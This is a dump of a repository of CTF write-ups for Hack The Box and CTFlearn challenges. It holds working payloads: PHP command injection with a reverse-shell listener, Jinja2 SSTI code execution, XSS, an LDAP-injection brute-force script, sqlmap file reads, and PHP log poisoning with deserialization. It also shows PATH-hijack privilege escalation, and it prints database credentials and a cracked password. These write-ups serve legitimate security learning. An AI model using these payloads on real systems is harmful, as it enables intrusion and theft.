file, `logs.php`, contains a vulnerability: `OS command injection`.\n\n```php\n$output = exec(\"/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}\");\necho $output;\n\n$filepath = \"/var/www/out.log\";\n$filename = \"out.log\"; \n```\n\nThe `delim` parameter is passed to `exec` without being sanitized, which allows us to inject OS commands.\n\nSo go back to the website, click the `management menu`, and open the `file logs` page.\n\nOn that page you can see the delimiter field, so capture this request in Burp Suite.\n\n<p align=\"center\">\n<img src=\"./images/09.jpg\">\n</p>\n\nBefore that, start a netcat listener:\n```\nnc -nlvp 1234\n```\nThen inject a reverse-shell payload into the delimiter parameter, as shown in the image.\n\n<p align=\"center\">\n<img src=\"./images/10.jpg\">\n</p>\n\nNow we get a shell in `netcat`.\n\nUpgrade the shell:\n```\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n```\nor\n```\necho os.system('/bin/bash')\n```\nNext, we are going to search for usernames and passwords in the `MySQL` database.\n\nThe `config.php` file from the site backup already gave us the database name and the credentials.\n```\nmysql -u root -D previse -p\n```\nIt will prompt for a password, so enter `mySQL_p@ssw0rd!:)`.\n\nNow we are inside the MySQL database.\n<p align=\"center\">\n<img src=\"./images/11.jpg\">\n</p>\nThere we find the password hash of our user. I cracked the hash; I'll post the result here as an exception for friends with weak machines. 
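\n\nThe `$1$` prefix identifies this as an md5crypt hash, so one typical way to crack it offline (assuming a wordlist such as rockyou.txt is at hand) would be:\n\n```\nhashcat -m 500 hash.txt rockyou.txt\n```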
\n\n`$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.` = `ilovecody112235!` \n\nNow that we have found our user information, let’s connect with the ssh port.\n```\nssh [email protected]\n```\n<p align=\"center\">\n<img src=\"./images/12.jpg\">\n</p>\n\n## Privilege Escalation\n\nNow, let’s see what command this user can run using `sudo`\n> sudo -l\n\n<p align=\"center\">\n<img src=\"./images/13.jpg\">\n</p>\n\nOn catting the file presented I got below result.\n```shell\n#!/bin/bash\n\n# We always make sure to store logs, we take security SERIOUSLY here\n\n# I know I shouldnt run this as root but I cant figure it out programmatically on my account\n# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time\n\ngzip -c /var/log/apache2/access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_access.gz\ngzip -c /var/www/file_access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_file_access.gz\n```\nFurther analyzing the file I have found a vulnerability which is path injection\nSo now enter into the tmp folder.\n\nTransfer the payload and the payload should be in the name of `gzip`.\n\nbefore that set the listener in our local machine\n\n> ncat -lvnp 4321\n\nNext, go to the machine and enter the below command\n\nFirst, enter the payload shown in the below image\n\n<p align=\"center\">\n<img src=\"./images/14.jpg\">\n</p>\n\n```shell\nexport PATH=/tmp:$PATH\n```\nOR \n\n```shell\nexport PATH=$(pwd):$PATH\n```\n\nThen enter the following command\n> sudo /opt/scripts/access_backup.sh\n\nAnd here we got root shell.\n\n<p align=\"center\">\n<img src=\"./images/15.jpg\">\n</p>" }, { "alpha_fraction": 0.6762114763259888, "alphanum_fraction": 0.6883260011672974, "avg_line_length": 31.428571701049805, "blob_id": "5379a7dc8b6d91f6316157ca0da7afe4c1b49858", "content_id": "edc2f06f92f89850401b65001fd321cc4b0c01c4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1816, "license_type": "permissive", "max_line_length": 135, "num_lines": 56, "path": "/HackTheBox/challenges/web/Templated/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Templated\n\n> Upon accessing the web instance, we will see this interface\n\n```\nSite still under construction\nProudly powered by Flask/Jinja2\n```\nThe message already informs us that the page is built using Flask / Jinja2.\n\nTo test this further, I will introduce routes in the url.\n\nI got a `404` error but notice what we entered as path in URL is getting rendered in the website. Here are a few `XSS` payloads.\n\n```\n<script>alert(\"hello\")</script>\n```\nIf you try this pyload, you will not get any results.\n\nBut the following pyload is executed :\n\n```\n<img src=! 
onerror=\"alert('hello')\">\n```\n\n# Server Side Template Injection (SSTI)\n\nAs a result, we know that the web is vulnerable to `XSS` payloads, but this did not lead us to the flag.\n\nAssuming that the challenge is titled `Templated` and that `Jinja2` is a web template engine for Python.\n\nThere might be a vulnerability related to `SSTI` (`Server Side Template Injection`).\n\nPayload : `{{46+46}}`\n\nOutput : it give `92` as output\n\nCurrently 2 vulnerabilities have been found, `SSTI` and `XSS` (`Reflected`)\n\nHere is an article regarding SSTI problems with [Flask and Jinja](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)\n\nBy using `__mro__ ` or `mro()` in Python, we can go back up the tree of inherited objects.\n\nWe can use the `MRO` function to display classes with the following payload\n\n```\n{{\"\".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[\"__builtins__\"][\"__import__\"](\"os\").popen(\"ls *\").read()}}\n```\n\nThe list shows all the files, and guess what we can see is `flag.txt`. Now we just need to replace `ls *` with `cat flag.txt`.\n\n```\n{{\"\".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[\"__builtins__\"][\"__import__\"](\"os\").popen(\"cat flag.txt\").read()}}\n```\n\nWe have finally obtained the flag. (^!^)\n" }, { "alpha_fraction": 0.7082380056381226, "alphanum_fraction": 0.7265446186065674, "avg_line_length": 96.11111450195312, "blob_id": "8bef76d704f9d9d8bb00cfc0c12dea30d63473a3", "content_id": "69896c621720245c18bd0396dfa13d25aa6639cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4380, "license_type": "permissive", "max_line_length": 312, "num_lines": 45, "path": "/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# CTF Write-ups\n<p align=\"center\">\n<img src=\"./resources/images/logo.png\">\n<br>\n<i>Writeups Challenges I have solved</i>\n</p>\n\nYou can see all the writeups here : <a href=\"https://hsnhk.gitbook.io/ctf-writeups/\">gitbook</a>\n\n* [CTF-writeups](https://github.com/HSNHK/CTF-writeups)\n * [Hack The Box](#hack-the-box)\n * [CTF learn](#ctf-learn)\n * [Try Hack Me](#tryhackme)\n\n# Hack The Box\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Previse | Machine | <img src=\"./resources/images/Previse_Machine_Banner.JPG\" height=\"110px\" style=\"border-radius: 30px; padding-top: 10px\"> | [Writeup](HackTheBox/machines/Previse) |\n| Toxic | Web | Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸 | [Writeup](HackTheBox/challenges/web/Toxic) | \n| Emdee five for life | Web | Can you encrypt fast enough? | [Writeup](HackTheBox/challenges/web/Emdee-five-for-life) |\n| FreeLancer | Web | Can you test how secure my website is? Prove me wrong and capture the flag! | [Writeup](HackTheBox/challenges/web/FreeLancer) |\n| Templated | Web | Can you exploit this simple mistake? | [Writeup](HackTheBox/challenges/web/Templated) |\n| Impossible Password | Reversing | Are you able to cheat me and get the flag? | [Writeup](HackTheBox/challenges/reversing/Impossible-Password) |\n| Illumination | Forensics | A Junior Developer just switched to a new source control platform. Can you find the secret token? 
| [Writeup](HackTheBox/challenges/forensics/Illumination) |\n| Phonebook | Web | Who is lucky enough to be included in the phonebook? | [Writeup](HackTheBox/challenges/web/Phonebook) |\n| baby ninja jinja | Web | The elders of the village summoned you to take the reigns after the recent death of you father. It's time to end the emperor's gruesome tyranny. | [Writeup](HackTheBox/challenges/web/baby-ninja-jinja) |\n| Gunship | Web | A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world... all the wooing in the world to make you feel more lonely... this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶 | [Writeup](HackTheBox/challenges/web/Gunship) |\n\n# CTF learn\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Inj3ction Time | Web | I stumbled upon this website: http://web.ctflearn.com/web8/ and I think they have the flag in their somewhere. UNION might be a helpful command | [Writeup](CTFlearn/web/Inj3ction-Time) |\n| Calculat3 M3 | Web | Here! http://web.ctflearn.com/web7/ I forget how we were doing those calculations, but something tells me it was pretty insecure. | [Writeup](CTFlearn/web/Calculat3-M3) |\n\n# Tryhackme\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Basic Malware RE | Room | This room aims towards helping everyone learn about the basics of “Malware Reverse Engineering”. | [Writeup](https://hsnhk.medium.com/tryhackme-basic-malware-re-bfcd518fd314) |\n| Reversing ELF | Room | Room for beginner Reverse Engineering CTF players. | [Writeup](https://hsnhk.medium.com/tryhackme-reversing-elf-60ab96969e41) |\n| Reverse Engineering | Room | This room focuses on teaching the basics of assembly through reverse engineering. | [Writeup](https://hsnhk.medium.com/tryhackme-reverse-engineering-9cd408849f13) |\n| Blue | Machine | Deploy & hack into a Windows machine, leveraging common misconfigurations issues. | [Writeup](https://hsnhk.medium.com/tryhackme-blue-1ccfae7c2e8a) |\n| OWASP Top 10 | Room | Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. | [Writeup](https://hsnhk.medium.com/tryhackme-owasp-top-10-e2b342c4f9f8) |\n| Nmap Room | Room | An in depth look at scanning with Nmap, a powerful network scanning tool. | [Writeup](https://hsnhk.medium.com/tryhackme-nmap-room-9db134d5c8cc) |\n| The find command | Room | A learn-by-doing approach to the find command. | [Writeup](https://hsnhk.medium.com/tryhackme-the-find-command-d64026d89c3) |\n| Disk Analysis & Autopsy | Forensic | Ready for a challenge? Use Autopsy to investigate artifacts from a disk image. 
| [Writeup](https://hsnhk.medium.com/tryhackme-disk-analysis-autopsy-f967c64feaf1) |\n" }, { "alpha_fraction": 0.7369308471679688, "alphanum_fraction": 0.7411466836929321, "avg_line_length": 56.878047943115234, "blob_id": "0ceefc819b6209d55264336a633a2d3a08d6dfff", "content_id": "a62881467d24aba14c817f2e79d5f6c16e5b35cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2372, "license_type": "permissive", "max_line_length": 281, "num_lines": 41, "path": "/HackTheBox/challenges/web/FreeLancer/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# FreeLancer\nIf you look at the page code, you will come across such commented codes :\n```html\n<!-- <a href=\"portfolio.php?id=1\">Portfolio 1</a> -->\n```\n>`[Address]` means challenge address because this address may be different for each participant. We used this symbol to indicate the challenge address.\n\nlike a lot of comments with pages to look at and that the portfolio is using the URL parameters. These all might be exploit points.\n\nIf we look at the page `[Address]/portfolio.php?id=1?` we can see that it is just that image that was shown on the home page, a label, and some filler text.\n\n<p align=\"center\">\n<img src=\"./image/img1.png\">\n<br>\nIf I visit other ID numbers the first 3 are all the same and the fourth and up are just images with no text.\n</p>\n\nIf again and try a few different inputs I find that anything other than a \";\" returns just the image with no text but if I used the \";\" then I get the text back. Now I want to try something a little more so I am going to move on to SQLMap to make this quicker.\n\n\nFor SQLmap I am going to run `python sqlmap.py -u [Address]/portfolio.php?id=1 --tables` which gave me 4 databases: `performance_schema`, `mysql`, `information_schema`, and `freelancer`. Freelance looks like the one we want and it has two tables in it: `portfolio` and `safeadmin`.\n\nNow that I know the tables I am going to change my query with SQLmap to `python sqlmap.py -u [Address]/portfolio.php?id=1 -T safeadmin --dump` to specify that I know the Table and I want to dump its contents. \n\n> `It seemed that we would not get results with this method`\n\nRunning ZAP did produce a file of `/administrat` that was not linked on the site and when I went there it was an admin login page.\n\n<p align=\"center\">\n<img src=\"./image/img2.png\">\n</p>\n\nI found two PHP files named `logout.php` and `panel.php` but the server does not allow us to access them.\nTo be able to download these files and view their source code, we can use sqlmap.\n\nUsually the pages are stored in the `/var/www/html` path. You can use this method to download the files :\n```\npython sqlmap.py -u [Address]/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php\n```\nAfter downloading the file, if you go to path `/.sqlmap/output/[Address]` in your system\nYou will see the downloaded file here and if you look at the code of this file you will see that there is a flag." 
}, { "alpha_fraction": 0.566679835319519, "alphanum_fraction": 0.6667985916137695, "avg_line_length": 25.06185531616211, "blob_id": "79f7ec3edd050993f2c8a3e38e42190b2efa2f45", "content_id": "b134f6798b24965d11d58e730254e13fdd94a3c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2533, "license_type": "permissive", "max_line_length": 143, "num_lines": 97, "path": "/HackTheBox/challenges/web/Phonebook/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Phonebook\n\nWhen we see the login form on the website, it might be command injection, `SQL injection`, `LDAP injection`. \n\nWe can see that this need us to login with workstation username, it might be `LDAP injection`.\n<p align=\"center\">\n<img src=\"./images/login.png\">\n</p>\nThis is an example of `LDAP injection` payload. We can check for vulnerabilities.\n\n```\nuser=*)(&\npassword=*)(&\n--> (&(user=*)(&)(password=*)(&)) \n\n```\n<p align=\"center\">\n<img src=\"./images/inject.png\">\n</p>\nOur response showed successful, and a search box appeared when we clicked the button.\n\nThen we type a character in the search box, and it returns some user phonebook information. I tried `flag`, `HTB`, it doesn't find any results.\n> If you search for `space`, you will see such information\n```\nKyle Reese\[email protected]\t555-1234567\nEllery Hun\[email protected]\t317-959-9562\nMadelaine Lush\[email protected]\t636-918-1006\nCurrey Conti\[email protected]\t529-673-3935\nChaim Smoth\[email protected]\t895-974-4117\nEldin Jelf\[email protected]\t363-426-3563\nGanny Marti\[email protected]\t796-793-6925\nJobey Olley\[email protected]\t607-345-0290\nKatalin Wilde\[email protected]\t414-839-2681\nStinky Trood\[email protected]\t933-416-1003\nTab Zoren\[email protected]\t360-678-3613\nUrsula Beer\[email protected]\t794-396-6882\nBryan Arman\[email protected]\t640-255-8092\nBabette Cunio\[email protected]\t709-363-0223\nBerget Novis\[email protected]\t780-278-2572\nCed Engley\[email protected]\t230-780-1999\nCaryn Germon\[email protected]\t967-789-6335\nDevina Alcide\[email protected]\t828-947-3484\nDionne Lammas\[email protected]\t824-561-5676\nEmmalynn Burnup\[email protected]\t148-856-7052\nFredericka Hanks\[email protected]\t762-337-5667\nHannah Inder\[email protected]\t315-711-6454\nJay Sharma\[email protected]\t893-382-5236\nLilyan Crepel\[email protected]\t851-980-1038\n...\n```\nThen we try to find user `Reese`, but the information doesn't look like flag.\n\noutput : `Kyle Reese\[email protected]\t555-1234567`\n\nThen we change our `payload` to check if the password is the flag.\n\n```\nuser=Reese\npassword=HTB*)(&\n--> (&(user=Reese)(password=HTB*)(& \n```\nThis indicates that the payload logs into the web successfully with the payload!\n\n> `The password is the flag!`\n\n## Brute force\n\nWe need to get the flag through `brute force`. 
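\n\nEach character guess works as a boolean oracle: the injected wildcard filter only matches when the guessed prefix of the password is correct, in which case the response contains the word `success`. A single probe can confirm the oracle before looping (the `/login` path below is a placeholder for whatever endpoint the form posts to):\n\n```\ncurl -s --data-urlencode 'username=Reese' --data-urlencode 'password=HTB*)(&' http://target/login | grep -i success\n```\n\n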
To do this, write a `Python script`.\n\n```python\nimport requests\nimport string\n\nURL = \"~\"\n\nasciiLower = list(string.ascii_lowercase)\n\nasciiUppercase = list(string.ascii_uppercase)\n\npasswordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + [\"_\", \"}\"]\n\npayload = \"HTB{\"\npassword = \"\"\n\nwhile True:\n for ch in passwordList:\n password = payload + ch + \"*)(&\"\n\n data = {\"username\": \"Reese\", \"password\": password}\n re = requests.post(URL, data=data)\n\n if \"success\" in re.text:\n payload += ch\n print(payload)\n\n```\nThe flag is like this 👌👉 `HTB{d1rectory_******_**_****}`" }, { "alpha_fraction": 0.5675675868988037, "alphanum_fraction": 0.5855855941772461, "avg_line_length": 25.428571701049805, "blob_id": "8d0419000ec204c710ee508221855690fcb9ac0a", "content_id": "d1a3cbe3c1ebf79ff82c98d503d6fd08ed6c4d70", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "permissive", "max_line_length": 60, "num_lines": 21, "path": "/HackTheBox/challenges/web/Emdee-five-for-life/script.py", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "import requests\nimport hashlib\nimport sys\nimport re\n\n\ndef main(url):\n request = requests.session()\n body = request.get(url).text\n text = re.search(\"<h3 align='center'>+.*?</h3>\",body)\n text = re.search(\">+.*?<\",text[0])\n hash = hashlib.md5(text[0][1:-1].encode()).hexdigest()\n response = request.post(url = url, data = {\"hash\":hash})\n flag = re.search(\"HTB{+.*?}\",response.text)[0]\n print(flag)\n\nif __name__==\"__main__\":\n if len(sys.argv) > 1:\n main(sys.argv[1])\n else:\n print(\"Please enter the challenge URL\")\n" }, { "alpha_fraction": 0.7071129679679871, "alphanum_fraction": 0.7196652889251709, "avg_line_length": 24.210525512695312, "blob_id": "c513396621e1432ea62ad750c4136ae1f678e86b", "content_id": "1c68be12ba30b2b84d962cbfec1a40d8668264e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 478, "license_type": "permissive", "max_line_length": 85, "num_lines": 19, "path": "/CTFlearn/web/Calculat3-M3/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Calculat3 M3\n\nA simple command injection challenge will be demonstrated in this walkthrough\n\nHere is the challenge page we got after visiting the given link.\n\nI provided random input in this calculator and intercepted the request with BurpSuite\n\nI got one parameter `expression` taking the values \n```\nexpression: 8 5 * 6 6 \n```\n`;ls` was used to try to inject commands\n\nAfter forwarding the request above, it has finally been flagged\n\n```\nctf{*****_***_***_***_*********}\n```" }, { "alpha_fraction": 0.6219751238822937, "alphanum_fraction": 0.6507521271705627, "avg_line_length": 22.507692337036133, "blob_id": "9e27f105a82918a7491225c6fbf4981eb58099ae", "content_id": "4309f8a14b8d1b8c89b4f74e88f86c6fe98ec722", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1531, "license_type": "permissive", "max_line_length": 129, "num_lines": 65, "path": "/HackTheBox/challenges/web/Emdee-five-for-life/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Emdee five for life writeup\n<b>Starting point</b>\n\nour only task is to submit the string after converting it to md5 hash \n\nbut when i tried to submit i got this\n> Yup Too slow\n\nWe'll automate this 
by writing a Python script\n\n# page source\n```html\n<html>\n<head>\n<title>emdee five for life</title>\n</head>\n<body style=\"background-color:powderblue;\">\n<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>B6KsLl2q3nMwLszk3DVJ</h3><center><form action=\"\" method=\"post\">\n<input type=\"text\" name=\"hash\" placeholder=\"MD5\" align='center'></input>\n</br>\n<input type=\"submit\" value=\"Submit\"></input>\n</form></center>\n</body>\n</html>\n```\n\n# Building the script\nSo with my crappy skills of regex let’s start building the logic\n\n`><h3 align='center'>sR1LvFdED1Toos1uBn6k</h3>`\n\nThis was achieved by using this\n\n`center'>+.*?</h3>`\n\n# script\n```python\nimport requests\nimport hashlib\nimport sys\nimport re\n\n\ndef main(url):\n request = requests.session()\n body = request.get(url).text\n text = re.search(\"<h3 align='center'>+.*?</h3>\",body)\n text = re.search(\">+.*?<\",text[0])\n hash = hashlib.md5(text[0][1:-1].encode()).hexdigest()\n response = request.post(url = url, data = {\"hash\":hash})\n flag = re.search(\"HTB{+.*?}\",response.text)[0]\n print(flag)\n\nif __name__==\"__main__\":\n if len(sys.argv) > 1:\n main(sys.argv[1])\n else:\n print(\"Please enter the challenge URL\")\n\n```\n# Getting the flag\n```\nD:\\hackthebox\\web>python script.py http://46.101.20.243:30585/\nHTB{*-*-*-*-*-*-*-*-*-*}\n```\n\n" }, { "alpha_fraction": 0.5957854390144348, "alphanum_fraction": 0.5996168851852417, "avg_line_length": 20.75, "blob_id": "c5c658b4daf8bcdb244555b0cef6ee8f349966d4", "content_id": "680ae06c477fa8f0e383cd58cd63b0163bb20f17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 522, "license_type": "permissive", "max_line_length": 85, "num_lines": 24, "path": "/HackTheBox/challenges/web/Phonebook/script.py", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nURL = \"~\"\n\nasciiLower = list(string.ascii_lowercase)\n\nasciiUppercase = list(string.ascii_uppercase)\n\npasswordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + [\"_\", \"}\"]\n\npayload = \"HTB{\"\npassword = \"\"\n\nwhile True:\n for ch in passwordList:\n password = payload + ch + \"*)(&\"\n\n data = {\"username\": \"Reese\", \"password\": password}\n re = requests.post(URL, data=data)\n\n if \"success\" in re.text:\n payload += ch\n print(payload)\n" }, { "alpha_fraction": 0.6932599544525146, "alphanum_fraction": 0.7214580178260803, "avg_line_length": 24.98214340209961, "blob_id": "f80fdbeba50d8eb1683800a9c753f2497ffed6a8", "content_id": "860c233b87656d1514e33ccb9c51a6d0a21f7676", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1454, "license_type": "permissive", "max_line_length": 209, "num_lines": 56, "path": "/HackTheBox/challenges/web/Toxic/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Toxic\nThe following is a quick writeup for the Toxic challenge.\n\nBy inspecting the challenge's files, specifically index.php and PageModel.php, we see that our phpsessid cookie is deserialised, and the file to display on the screen is retrieved from the deserialised object.\n\nThe cookie is converted to ascii and the object is produced\n```\necho 'Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9' | base64 -d\nO:9:\"PageModel\":1:{s:4:\"file\";s:15:\"/www/index.html\";}\n```\nWhile we are able to read and modify files from the server, we 
cannot access the flag file since we don't know its name. Therefore, we poison the server logs.\n\n```\necho 'O:9:\"PageModel\":1:{s:4:\"file\";s:25:\"/var/log/nginx/access.log\";}' | base64\nTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNz\nLmxvZyI7fQo=\n```\nThis new cookie will be sent to the server, and the log file can be read.\n```\nGET / HTTP/1.1\nHost: 127.0.0.1:1234\nUser-Agent: <?php system('ls /');?>\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0\n```\nWe send this request to poison the nginx log, and when we display the log file again, we see a directory listing.\n```\ndev\nentrypoint.sh\netc\nflag_SDCCSD\nhome\nlib\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n```\nThe cookie reads the flag file, we send it to the server, The flag is ours.\n```\necho 'O:9:\"PageModel\":1:{s:4:\"file\";s:11:\"/flag_SDCCSD\";}' | base64\n\nTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfU0RDQ1NEIjt9\n```" }, { "alpha_fraction": 0.5945355296134949, "alphanum_fraction": 0.6065573692321777, "avg_line_length": 31.714284896850586, "blob_id": "dc2f07d96219cc1c4506043ae801fd548d0f7834", "content_id": "916e81998fb43d8c6a7bfff5cd17f091da258f51", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 929, "license_type": "permissive", "max_line_length": 167, "num_lines": 28, "path": "/CTFlearn/web/Inj3ction-Time/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Inj3ction Time \nFrom the description you’ll notice that there’s SQLi and you’ll use UNION query, the injection here is UNION based. Nice !\n\nYou’ll find that there’s input field ID and you should enter numbers and then you’ll see information about the users, if you try to insert words you won’t get anything\n\n> You can use sqlmap\n\nWe must first extract the names of the existing databases :\n```\npython sqlmap.py -u https://web.ctflearn.com/web8/?id= -p id --dbs\n\navailable databases [2]:\n[*] information_schema\n[*] webeight\n```\nThe next step is to extract the `webeight` database information\n```\npython sqlmap.py -u https://web.ctflearn.com/web8/?id= -p id -D webeight --dump\n\nDatabase: webeight\nTable: w0w_y0u_f0und_m3\n[1 entry]\n+---------------------------------+\n| f0und_m3 |\n+---------------------------------+\n| abctf{*-*-*-*-*-*-*-*-*-*-*-*-} |\n+---------------------------------+\n```" }, { "alpha_fraction": 0.4330598711967468, "alphanum_fraction": 0.5795950293540955, "avg_line_length": 49.25877380371094, "blob_id": "531e3eaf36e254c7f808b904802e41ab412be534", "content_id": "14b686d3d03c60630fe560a1cfe1241a1fabf3da", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11822, "license_type": "permissive", "max_line_length": 260, "num_lines": 228, "path": "/HackTheBox/challenges/reversing/Impossible-Password/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Impossible Password\n\nOnce extracted, we have the `impossible_password.bin` file. 
Let's see what type it is.\n```\nfile impossible_password.bin\nimpossible_password.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ba116ba1912a8c3779ddeb579404e2fdf34b1568, stripped\n```\n\nIt’s an `ELF 64-bit LSB` executable.\n\nStrings inside the `.data` section\n```\nrabin2 -z impossible_password.bin\n[Strings]\nnth paddr vaddr len size section type string\n―――――――――――――――――――――――――――――――――――――――――――――――――――――――\n0 0x00000a70 0x00400a70 14 15 .rodata ascii SuperSeKretKey\n1 0x00000a82 0x00400a82 4 5 .rodata ascii %20s\n2 0x00000a87 0x00400a87 5 6 .rodata ascii [%s]\\n\n```\n\n`SuperSeKretKey` appears to be interesting\n\n# Execution\n```\nchmod +x impossible_password.bin\n./impossible_password.bin\n* SuperSeKretKey\n[SuperSeKretKey]\n** WhatShouldIWrite?\n```\n\nBy executing this program, a star `(*)` is displayed. I want to write `SuperSeKretKey` because the string displayed in the `.data` section informs us that the string (`%s`) is manipulated. Indeed, when I put SuperSeKretKey, this text is surrounded with `[]`.\n\nAfter this, two stars `(**)` are displayed. I’ve tried to write many things (as WhatShouldIWrite?), but the program always terminates\n\nIt looks like the program is waiting for a specific string, but I don’t know what it is.\n\n# Reverse engineering\n<i>Let's use Radare2</i>\n\nPerform analysis :\n```\nradare2 impossible_password.bin\n[0x004006a0]> aaaa\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[x] Finding function preludes\n[x] Enable constraint types analysis for variables\n```\nChange memory address to main function :\n```\n[0x004006a0]> s main\n[0x0040085d]>\n```\nThe focus is now at the `main()` address: `0x0040085d`.\n\n# Disassemble\n\nWith the `pdf` command, disassemble the `main()` code \n\n> pdf => `print disassemble function`\n\n```\n[0x0040085d]> pdf\n ; DATA XREF from entry0 @ 0x4006bd\n┌ 283: int main (int argc, char **argv);\n│ ; var int64_t var_50h @ rbp-0x50\n│ ; var int64_t var_44h @ rbp-0x44\n│ ; var int64_t var_40h @ rbp-0x40\n│ ; var int64_t var_3fh @ rbp-0x3f\n│ ; var int64_t var_3eh @ rbp-0x3e\n│ ; var int64_t var_3dh @ rbp-0x3d\n│ ; var int64_t var_3ch @ rbp-0x3c\n│ ; var int64_t var_3bh @ rbp-0x3b\n│ ; var int64_t var_3ah @ rbp-0x3a\n│ ; var int64_t var_39h @ rbp-0x39\n│ ; var int64_t var_38h @ rbp-0x38\n│ ; var int64_t var_37h @ rbp-0x37\n│ ; var int64_t var_36h @ rbp-0x36\n│ ; var int64_t var_35h @ rbp-0x35\n│ ; var int64_t var_34h @ rbp-0x34\n│ ; var int64_t var_33h @ rbp-0x33\n│ ; var int64_t var_32h @ rbp-0x32\n│ ; var int64_t var_31h @ rbp-0x31\n│ ; var int64_t var_30h @ rbp-0x30\n│ ; var int64_t var_2fh @ rbp-0x2f\n│ ; var int64_t var_2eh @ rbp-0x2e\n│ ; var int64_t var_2dh @ rbp-0x2d\n│ ; var int64_t var_20h @ rbp-0x20\n│ ; var int64_t var_ch @ rbp-0xc\n│ ; var int64_t var_8h @ rbp-0x8\n│ ; arg int argc @ rdi\n│ ; arg char **argv @ rsi\n│ 0x0040085d 55 push rbp\n│ 0x0040085e 4889e5 mov rbp, rsp\n│ 0x00400861 4883ec50 sub rsp, 0x50\n│ 0x00400865 897dbc mov dword [var_44h], edi ; argc\n│ 0x00400868 488975b0 mov qword [var_50h], rsi ; argv\n│ 0x0040086c 48c745f8700a. 
